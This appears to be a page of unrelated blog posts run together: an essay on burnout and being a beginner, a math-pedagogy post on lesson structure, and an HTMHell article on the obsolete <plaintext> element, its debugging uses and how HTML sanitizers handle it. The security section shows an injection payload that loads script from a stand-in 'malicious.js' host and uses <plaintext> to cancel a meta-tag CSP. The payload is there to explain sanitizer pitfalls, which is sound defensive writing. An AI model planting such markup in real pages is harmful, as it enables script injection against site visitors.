
The surprisingly freeing joy of being bad at something


Lately I’ve been thinking about how much pressure we put on ourselves to only do things we’re already good at. Somewhere along the way, “trying something new” stopped sounding fun and started feeling like a reputational risk. Like if you can’t perform at a certain level instantly, you shouldn’t bother.

That mindset looks harmless from the outside. It feels responsible. Mature, even. But it quietly chokes off the part of you that’s curious, playful, and willing to be surprised. And it keeps you stuck in the same narrow corners of your life.

What I’ve been noticing in myself is this instinct to avoid anything where I can’t show up as the polished version of who I used to be. The competent one. The quick learner. The person who could pick something up and immediately “get it.”

(We’ve been unpacking this in therapy.)

Burnout has a way of shrinking your world like that. Even long after the exhaustion fades, the pressure to not mess up can linger. You don’t want to see yourself fall short again, so you avoid situations where you might.

I’ve accepted that I’ve been putting pressure on myself that nobody else is even giving a second thought to. Nobody is asking me to figure it out on the first try, to be immediately good at something. It’s a self-imposed requirement that sets me up to fail.

But recently, I’ve been letting myself be bad at things again. Truly bad. And there’s something surprisingly freeing about it.

Being bad lowers the stakes

Take learning French. I have all the apps. All the books. All the good intentions. And yet: my pronunciation? Rough. My verb conjugations? In progress. My confidence? Depends on the hour. Generally low. I’m still terrified to speak French in public, but I did say one sentence in French out loud today. Please clap.

For a while, that bothered me. I felt slow. Like I was failing. Like my brain should just “try harder.”

But then I realized that the moment you admit you’re bad at something, the pressure to be perfect disappears. There’s nothing to protect. No expectations to uphold. You’re just a person learning a new thing, which is one of the most human experiences you can have.

It’s honestly kind of fun.


Being bad opens the door to creativity

There’s also this unexpected creativity that shows up when you stop needing to be good right away. When you’re allowed to make mistakes, you naturally experiment more. You explore. You follow impulses without evaluating whether they’re “right.”

That messy middle is where the good stuff hides.
It’s where play comes back.

And play is a muscle you lose when everything in your life has revolved around productivity, competence, or survival.

Being bad rebuilds your trust in yourself

The more I let myself be terrible at something, the more I notice how quickly “terrible” turns into “okay,” and how “okay” eventually turns into “not bad actually.”

It’s not about the skill. It’s about proving to yourself that you can start small, stay with it, and watch the world open a little because you were brave enough to begin.

That’s the quiet part of burnout recovery no one talks about. Your life expands again through the small, low-stakes attempts.

Not through a grand reinvention, but through tiny, unimpressive experiments that remind you you’re still capable of learning and creating.

Letting yourself be a beginner again

So here’s where I’ve landed:

You don’t need confidence before you try something. Confidence shows up after you’ve tried it enough times that you stop caring how you look doing it.

Letting yourself be bad at something isn’t a failure. It’s an act of self-trust. It’s choosing curiosity over ego. It’s giving yourself permission to exist outside the narrow confines of what you already know how to do.

Honestly, it feels good to grow again, even if the growth looks awkward at first.

If you’re in a season of rebuilding, or rediscovering parts of yourself, or letting your world widen after it’s felt small for a while, maybe give yourself the gift of being bad at something. You might enjoy who you become on the other side of it.


Very Good Music Fun Facts

Sometimes, you are at a party with new people and need something to talk about.



An Alternative to I/We/You


Gradual Release of Responsibility

I’m not a fan of I/we/you lessons.

I/we/you is the default lesson structure for lots of math teachers. Start by modeling a skill. Then work through the skill as a class. Then give students some independent practice.

The tagline for this type of teaching is “gradual release of responsibility.” A graph of the lesson might look like this:

Take the task you want students to be able to do. Start by offering a lot of support, typically by modeling or looking at examples, then gradually have the students do more of the work themselves until they’re doing the task on their own.

I don’t think this is a good model. Instead of I/we/you with gradual release of responsibility, I think it’s more helpful to think of a gradual increase in difficulty.

Gradual Increase in Difficulty

Gradual increase in difficulty might look like this:

But that’s actually not realistic. The stuff we want kids to learn doesn’t break down into nice neat steps that are all the same size. Maybe a lesson looks more like this:

I’m not putting teacher support on here, because it’s not some predetermined gradual release of responsibility. Instead it’s adaptive: some steps are small and students can make the jump without much support. Others are trickier and require more support.

Here’s what this might look like in terms of I/we/you:

You/I/you/you/I/you (this is a bunch of review questions about relevant prior knowledge, with some quick reteaches as necessary)

I/we/you (there’s a jump in difficulty that students need some support with)

I/you/I/you (this is two quick cycles for small, manageable chunks of new learning building on the last step)

You/you (this is a few more jumps in difficulty, but smaller jumps that students can do on their own)

I/you (one final model and then some more practice)

The key to making all this work is to break learning down into small, manageable steps, and help students connect each new step to what came before it. This is a big mental shift from teaching one objective at a time. It requires knowing your content well. It also means tossing out some of the curricular resources you might’ve been given.

I’m sure some people are saying, “Hey, this is how I teach, and I call this I/we/you.” Great! Glad we agree. My experience is that what I’m describing is very different from how most teachers conceptualize I/we/you. This is not a “gradual release” model — the support varies across the lesson, with students doing plenty on their own very early on. There’s some I/we/you within the lesson, but it doesn’t start with the “I” chunk and I don’t think I/we/you is a good way to describe this type of teaching. I/we/you is a tool. It’s useful at some specific places in a lesson, but not a structure for entire lessons.

Some Benefits

Here are some benefits of the gradual increase in difficulty approach:

  • Review is so important. Review to improve retention of what was taught yesterday, to activate prior knowledge, to check prerequisite knowledge and reteach if necessary. When done well, review can also build confidence early in a lesson. I realize there is no rule saying “no review is allowed in I/we/you lessons.” But if the name of the teaching strategy begins with the “I” section, that will inevitably push teachers away from starting with review.

  • There are no sudden jumps in difficulty. I’ve seen — and taught — plenty of I/we/you lessons that are a bit of a mess. The jump in difficulty is just too big. The teacher knows it, so the “I” and “we” stages drag on. There’s not much time left for independent practice, half the class is confused, and it all ends in a muddle. I can’t promise you that a gradual-increase-in-difficulty lesson will go smoothly. That’s not how teaching works. But by approaching learning one small step at a time, it’s much less likely to fall apart completely. Maybe students are shaky on some of the early steps, and they take longer than you would like. Maybe you don’t get through everything you planned. Much better to teach the first few steps well than to bite off more than you can chew and have to start from scratch the next day.

  • There are fewer artificial divisions between objectives. I/we/you lessons break content down into lesson-size chunks. Here is today’s objective, then tomorrow’s, then the next day’s. Unfortunately, learning doesn’t always fit neatly into those chunks. Some days will be too much, some will be too easy. Focusing on a gradual increase in difficulty throws out those distinctions. It’s a gradual ramp, and you get through what you get through in each lesson.

  • There are more opportunities to check for understanding. It is possible to check for understanding in the “I” and “we” stages of an I/we/you lesson. But it’s not easy. The entire premise is a gradual release of responsibility, so students aren’t doing the task independently until the “you” stage. A gradual-increase-in-difficulty lesson involves lots of “you” throughout the entire lesson. You have lots of chances to check for understanding, reteach, support specific students, and adjust as you go.

  • Students are more motivated when they can successfully solve problems early in a lesson. Get students doing math and building confidence as early as you can, and use that confidence to tackle more challenging problems.

  • The teacher support is dynamic. For some tasks, students need a lot of guidance. You can provide that. For others, students can extend what they know with much less support. You can do that too. The key is the gradual increase in difficulty, and that helps to reduce teacher talk and get students doing as much of the thinking as possible.

  • It’s easier to interleave. Interleaving different skills is a key aspect of increasing difficulty that’s often forgotten until the review day before the test. Students need mixed practice, identifying different types of questions and applying different solution strategies. In a typical I/we/you structure, each objective lives in its own world. In a gradual increase in difficulty, many of those small steps are just interleaved practice between distinct skills.

  • It’s easier to include challenging, non-routine problems. In an I/we/you structure, more challenging problems are often saved until the end of the unit, or for specific objectives like “solve multi-step problems.” In this model, the gradual increase in difficulty means that I can often end classes by challenging students to apply what they’ve learned in a few different and non-routine ways, rather than being laser focused on one very specific objective.

  • I spend less time explaining. Lots of explanations go on too long because students don’t have solid prior knowledge, or the jump in difficulty is too big, or the teacher feels like they need to explain everything about a topic before students try it. In a gradual increase in difficulty model, there’s a bunch of work to prepare students for the explanations I do include. But those explanations happen in small chunks that are only slightly more difficult than the last step, and when students can figure something out themselves I let them do so. All that adds up to way less time explaining. I’m not against explaining — teachers should explain things to students! But those explanations should be short, and should get students doing math as soon as possible.

I realize that the difference between a gradual release of responsibility and a gradual increase in difficulty may seem small. But I think it’s a really valuable paradigm shift, and it opens up a ton of opportunities that are lost in a typical I/we/you structure. I/we/you isn’t totally broken — I use it as one element of the gradual increase approach. But it’s just one strategy for me, rather than a way to structure an entire lesson. Whenever I think about teaching a new topic, I start by finding ways to break that topic down into small chunks and sequencing those chunks in a gradual increase in difficulty. It’s not easy at first. But the more I’ve practiced breaking topics down into small, manageable bits, the more this type of teaching makes sense to me.


Beej's Guide to Learning Computer Science


Using the Ancient Evils for Debugging

by Manuel Strehl

Deep down in the dark voids of HTML specs long gone sleeps a terrifying thing. Imagine, if you will, a DOM node so mighty that it can change the content-type of parts of the document. An HTML element that makes the parser tremble and withdraw, and that cannot be stopped even by its own end tag.

The wise people of W3C try to keep the knowledge of this terror away from the mere mortals’ eyes to spare us the danger of its madness. They advise us not to use the magic tag name that is the incantation for this ancient malice.

We will, of course, do exactly this today. We’ll take a deep look at the <plaintext> element and what fun things we can use it for.

A Quick Warning

This being said, I’d like to point out one important thing: Do not use this element in production. The HTML living standard is quite clear about this:

Elements in the following list are entirely obsolete, and must not be used by authors: [...] plaintext

So, what does <plaintext> do that earned it its place on HTML’s list of deprecated elements? In a nutshell, it ends the HTML parser and instructs the browser to interpret everything following as plain text.

That is to be taken literally. Really everything, including any closing </plaintext> or </html>, will be printed as if a rogue, unclosed <pre> had suddenly gone haywire and slurped up the rest of the page. By the way, this makes <plaintext> the only non-empty element that has no end tag at all.
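To see this in action, here’s a minimal page you can save as a file and open in a browser (my own throwaway example, not from the spec):

<!DOCTYPE html>
<p>This paragraph still renders as normal HTML.</p>
<plaintext>
Everything from here on is displayed verbatim:
<b>no bold</b>, <!-- no comments -->,
and not even </plaintext> or </html> can stop it.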

What Do We Use this Power For?

At first sight, that sounds like a really stupid superpower. At second sight, it still does. We look into how the element became part of HTML below. But for now, we’ll use it for one specific purpose: debugging server-side code.

Of course, specialized debuggers like XDebug for PHP or built-in error pages in frameworks like Django take over the heavy lifting here. And even the good ol’ print "<script>console.log('here!')</script>" is often helpful. Those tools should be high up in your utility belt.

But imagine this: You are deep in your code, chasing an elusive bug that affects only part of the HTML output, and you want to spot on the rendered page exactly where it shows up. The fastest way is to put a quick <plaintext> close to the offending place, reload the page, and presto! Just scan down to where the markup starts to show through.
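In practice that can be as crude as dropping the tag into the template right above the suspicious block (a sketch with made-up markup; remember to take it out again):

<!-- the page above this point renders normally -->
<!-- TODO: remove before commit -->
<plaintext>
<div class="sidebar">
  everything from here down appears as raw source,
  so the first piece of broken markup is easy to spot
</div>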

This is especially useful for formatted debugging output. A var_dump() in PHP, for example. Or an error.stack stack trace in Node.js. Slap a <plaintext> in front of it before writing it to the HTML output, so that the string is immediately readable:

<?php
# TODO delme!
echo '<plaintext>'; var_dump($strange_variable);

Screenshot: the HTMHell website, where the lower part shows a PHP variable dump followed by the site’s raw markup instead of the rendered HTML.

If you’re working on an Express application, it could look like this:

try {
  some_method();
} catch (error) {
  response.send(`<plaintext>${error.stack}`);
}

Screenshot: the same HTMHell website as above, with the lower part showing a JS error stack followed by the site’s raw markup instead of the rendered HTML.

The History behind this Evil

How did this seemingly fringe feature end up in all mainstream browsers? It was indeed there from the very beginning of HTML, as this historic W3C document from 1992 proves:

Plaintext

This tag indicates that all following text is to be taken litterally [!], up to the end of the file. Plain text is designed to be represented in the same way as example XMP text, with fixed width character and significant line breaks. Format:

<PLAINTEXT>

This tag allows the rest of a file to be read efficiently without parsing. Its presence is an optimisation. There is no closing tag.

This also tells us the reason for its invention. Back then, the high-end NeXT computer Sir Tim Berners-Lee used to write the first web browser had a quarter of the power of a hand-me-down 2009 smartphone. It was important to optimize wherever you could.

Given that the early WWW was meant as a place to share scientific information, having a large blob of plain text as part of your fancy new HTML page was relatively common. Being able to switch off the costly HTML parser and fall back to simply printing the remainder of the file as plain text was a powerful tool.

Screenshot: a 1992 example of the <plaintext> element, rendered by an emulation of the very first web browser at CERN. (I had to trick it a bit, though, because the file that the emulator would try to access returned a 404 error.)

Such a feature isn’t unique to HTML, either. For example, the programming language Perl uses a special marker to tell the Perl parser to stop processing the remainder of the file:

print 'this is Perl code';
__END__
cout << 'this isn’t anymore';

(Perl programmers use this not for performance reasons but to embed additional data into their programs.)

Of course, nowadays, in the face of multi-megabyte JS payloads, this optimization has become completely unnecessary.

How Safe Are We?

But the element is still looming in all browsers, so it’s worth keeping a bit of working knowledge of it at the back of our minds.

To give you an example of how this feature could be misused, assume a blog with a comment function, where a commenter manages to smuggle in the string <plaintext>. As good developers we know never to trust user input, so we put the comment through a sanitizer. Let’s take a look at where things can go south from here.

We use the test string

<p><b>hello<plaintext>world!</plaintext></b></p>

to check how several sanitizer libraries react to it.

There Goes the Sanity!

We run each sanitizer in the most minimal configuration that produces any output. This is by design: sanitizers are security products. They should produce safe output by default.

The results are quite surprising, though. You will notice that no two libraries (apart from the Sanitizer API and DOMPurify, where the former was directly inspired by the latter) agree on how to sanitize our test string.

The new HTML Sanitizer API as implemented in Firefox

developer.mozilla.org/en-US/docs/Web/API/Document/parseHTML_static

Code:

console.log(Document.parseHTML(TEST_STRING).body.innerHTML);

The approach of this API is to somehow get the nesting correct again according to the HTML5 parser spec. That is, close the <p> and <b> tags, then re-open the <b> tag as the spec suggests. The API does not deal with the special semantics of <plaintext> at all, though.

Result:

We end up with a string that has the <plaintext> element and its content stripped away:

<p><b>hello</b></p>

Poor man’s DOM sanitizing

Code:

const div = document.createElement('div');
div.innerHTML = TEST_STRING;
console.log(div.innerHTML);

For this test we set the test string via HTMLElement.innerHTML and read it back from .innerHTML. Chrome and Firefox show the same result. This does not really sanitize anything. But we include it in the list, because it demonstrates what the browser will do to the test string when interpreting it as HTML.

Result:

The result is a mangled version of the original, which will have double-encoded content in the still retained <plaintext> element.

<p><b>hello</b></p><plaintext><b>world!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b></plaintext>

NB: We can trick the Sanitizer API into producing this output, too, if we’re careless with its configuration:

Document.parseHTML(TEST_STRING, { sanitizer: { removeElements: []}}).body.innerHTML

HTML Tidy

www.html-tidy.org/

Code:

echo -n "$TEST_STRING" | tidy

Result:

The venerable Tidy replaces the <plaintext> with a <pre>. This is creative.

<p><b>hello</b></p>
<pre><b>world!</b></pre>

xss

jsxss.com/

Code:

import xss from 'xss';
console.log(xss(TEST_STRING));

Result:

A well-known JavaScript-based sanitizer with special focus on XSS prevention escapes only the <plaintext> tags and leaves everything else in place.

<p><b>hello&lt;plaintext&gt;world!&lt;/plaintext&gt;</b></p>

DOMPurify

github.com/cure53/DOMPurify

Code:

import { JSDOM } from 'jsdom';
import DOMPurify from 'dompurify';

const purify = DOMPurify(new JSDOM('').window);
console.log(purify.sanitize(TEST_STRING));

Result:

The classic JS sanitizer chooses to remove the <plaintext> and all its “content”. (I put content in quotes, because technically everything after the start tag would’ve been the <plaintext>’s content.) DOMPurify sees to it that the elements are properly closed. The result is identical to that of the Sanitizer API.

<p><b>hello</b></p>

HTML Purifier

htmlpurifier.org/

Code:

<?php
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
printf($purifier->purify(TEST_STRING));

Result:

The top dog in the PHP world takes a slightly different approach. It removes only the element itself. (Note the “world!” remaining intact.)

<p><b>helloworld!</b></p>

Symfony HtmlSanitizer

symfony.com/html-sanitizer

Code:

<?php
use Symfony\Component\HtmlSanitizer\HtmlSanitizer;
use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;

$config = (new HtmlSanitizerConfig())->allowSafeElements();
$sanitizer = new HtmlSanitizer($config);
printf($sanitizer->sanitize(TEST_STRING));

Result:

Symfony’s sanitizer has a fascinating way of moving tags around. Interesting, but at least we’ve got all elements properly closed, including the uncloseable plaintext.

<p><b>hello</b></p><plaintext>world!</plaintext>

xmllint

gnome.pages.gitlab.gnome.org/libxml2/xmllint.html

Code:

echo -n "$TEST_STRING" | xmllint --html -

Result:

This libxml-based tool produces a warning about an “invalid tag plaintext” but keeps the markup completely unchanged:

<p><b>hello<plaintext>world!</plaintext></b></p>

Mozilla Bleach

github.com/mozilla/bleach

Code:

import bleach
print(bleach.clean(TEST_STRING))

Result:

Python developers who reach for this library will have everything but the <b> escaped.

&lt;p&gt;<b>hello&lt;plaintext&gt;world!&lt;/plaintext&gt;</b>&lt;/p&gt;

OWASP Java HTML Sanitizer

github.com/OWASP/java-html-sanitizer/

Code:

import org.owasp.html.PolicyFactory;
import org.owasp.html.Sanitizers;

public class Sanitize {
    public static void main(String[] args) {
        PolicyFactory policy = Sanitizers.FORMATTING.and(Sanitizers.LINKS);
        String safe = policy.sanitize(TEST_STRING);
        System.out.println(safe);
    }
}

Result:

The staple HTML sanitizer in the Java world escapes everything and does strange things to the end tags, but at least the <plaintext> is gone.

<b>helloworld!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b>

Ammonia as configured by nh3

github.com/rust-ammonia/ammonia, nh3.readthedocs.io/

Code:

import nh3
print(nh3.clean(TEST_STRING))

This Rust-based sanitizer advertises its speed and conformance with the HTML spec.

Result:

The result is close to, but still different from, what browsers will do. In this case, it’s the <b> tag that would not extend over the content of the <plaintext> element.

<p><b>hello</b></p><b>world!&lt;/plaintext&gt;&lt;/b&gt;&lt;/p&gt;</b>

With 11 sanitizing methods we managed to produce 10 different outputs!

Just to be crystal clear here: we are not criticizing the result of any of these libraries. Each one has a good reason to do what it does. And each one serves a slightly different purpose.

But it emphasizes the point that one should be absolutely sure about the aim of a chosen sanitizer and the extent to which it will change its input. Is the library meant to remove only potentially dangerous things while keeping as much HTML intact as possible? Is it meant to strip all HTML from the string, or only to escape HTML-special characters? The results will differ tremendously.

We enter the danger zone when mixing several tools together without taking a cautious look first.

For example, look at how DOMPurify and HTML Purifier would interact in a potentially hazardous way. DOMPurify removes any <plaintext> including its content, so a later check for a malicious payload would come up negative. HTML Purifier, on the other hand, strips only the <plaintext> tag, while its content remains on the page. If we trusted the earlier DOMPurify result, we would be surprised by new content suddenly appearing verbatim in the HTML.

If one library is used for input validation and another one for output quoting, that’s a cross-site scripting disaster waiting to happen, unless we know exactly what we’re doing.

Letting the Evil Sleep Again

In the case of <plaintext> itself we are most likely in a safe place. Since <plaintext> has built-in HTML escaping, the potential for doing something dangerous with it is severely limited. It takes quite a rare constellation of errors and oversights appearing together to run malicious code.

For the sake of the argument, let’s create such a constellation. Assume that you embed a Content-Security Policy on your site in a <meta> element instead of an HTTP header:

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">

This is sufficient to prevent loading third-party scripts. But if an attacker finds a way to inject HTML before this element, they can nullify the CSP:

<script src="https://example.com/malicious.js"></script>
<plaintext>
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">

But again, for this to really have any effect, several things must come together:

  • The attacker must be able to place HTML in the <head> (because CSP meta tags can only be used there)
  • The CSP is not set via HTTP
  • The complete remainder of the page is converted to text/plain, which makes this definitively not a stealthy attack

So we can conclude: It is important to know about <plaintext>. But if we follow tried and tested security rules (for example the OWASP Application Security Verification Standard), we will remain safe from this ancient evil.

I’d like to thank Tom Schuster, Christian Vogl, and Daniela Strehl for valuable input to this article and Elise Hein for an extremely helpful review.


Introducing RFC Hub
